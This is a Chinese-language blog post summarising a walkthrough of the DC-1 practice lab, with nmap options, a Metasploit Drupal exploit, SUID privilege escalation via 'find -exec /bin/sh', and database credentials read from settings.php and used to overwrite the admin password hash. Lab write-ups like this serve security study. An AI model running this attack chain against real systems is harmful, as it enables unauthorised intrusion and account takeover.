13
0
0

DC-1靶场总结

2026-09-15
2026-09-15
DC-1靶场总结
文章摘要
|

1、nmap使用

类型

说明

-sS

半开扫描

-sT

全连接

-sU

UDP扫描

-sV

版本探测

-sn

Ping扫描

类型(端口指定)

说明

-p

指定端口

-p-

所有端口

-p 1-1000

端口范围

选项(定时)

说明

-T0

极慢,IDS规避

-T3

默认

-T5

极快,可能丢包

2、msfconsole使用

Exploit模块使用流程(Drupal为例)

search drupal

image-20260915095308107

use <module>

image-20260915095337504

show options //显示参数

image-20260915095912592

set RHOSTS [ip] //设置必要参数

image-20260915100020800

run //执行攻击

## 3、创建可交互shell

 python -c 'import pty; pty.spawn("/bin/sh")'

4、查找文件属主为root的文件

 find / -prem -4000 2> /dev/null
 ​
 #
 -prem  按文件权限查找文件
 -4000  带有SUID的文件
 2> /dev/null   错误信息丢弃
 1> /dev/null   正确信息丢弃
 > /dev/null 2>&1  全部丢弃

5、SUID提权

find 程序本身带 SUID 位(属主 root)

/tmp文件夹创建任意文件(存放临时文件,不易被管理员发现)

 find [任意文件] -exec ‘/bin/sh’ \;  
 #找到文件后执行 -exec 之后的命令

6、Drupal 网站的配置固定路径:sites/default/

7、命令提示符

 ~$  普通用户权限
 ~#  管理员权限

全部命令

 nmap -sP 192.168.177.0/24
 nmap -A 192.168.177.129
 msfconsole
 search drupal
 use 1
 set  RHOSTS  192.168.177.129
 run
 shell
 python -c 'import pty;pty.spawn("/bin/bash")'
 find / -perm -4000 2>/dev/null
 cd /tmp
 mkdir 123
 find 123 -exec '/bin/sh' \;
 cd /var/www
 ls
 cat flag1.txt        找到flag1
 cd /var/www/sites/default
 cat settings.php     找到flag2
 mysql -udbuser -pR0ck3t
 show databases
 use drupaldb
 select * from users\G
 cd /var/www
 php scripts/password-hash.sh 123
 复制生成的密钥$S$D6zpvdA6iMFhDzvqlSytaT1MI2oHzUlWM/nC6pKlWXfXg7SiUBkI
 mysql -udbuser -pR0ck3t
 show databases
 use drupaldb
 update users set pass="$S$D6zpvdA6iMFhDzvqlSytaT1MI2oHzUlWM/nC6pKlWXfXg7SiUBkI" where name="admin";
 浏览器页面中使用admin进入后台,在content选项卡中找到flag3
 cd /home/flag4
 cat flag4.txt        找到flag4
 cd /root
 ls
 cat thefinalflag
 结束


支持与分享

如果这篇文章对你有帮助,欢迎分享给更多人或者给予支持!

DC-1靶场总结
/archives/dc-1ba-chang-zong-jie
作者
Ha-zero
发布于
2026-09-15
许可协议
CC BY-NC-SA 4.0

欢迎来到我的博客!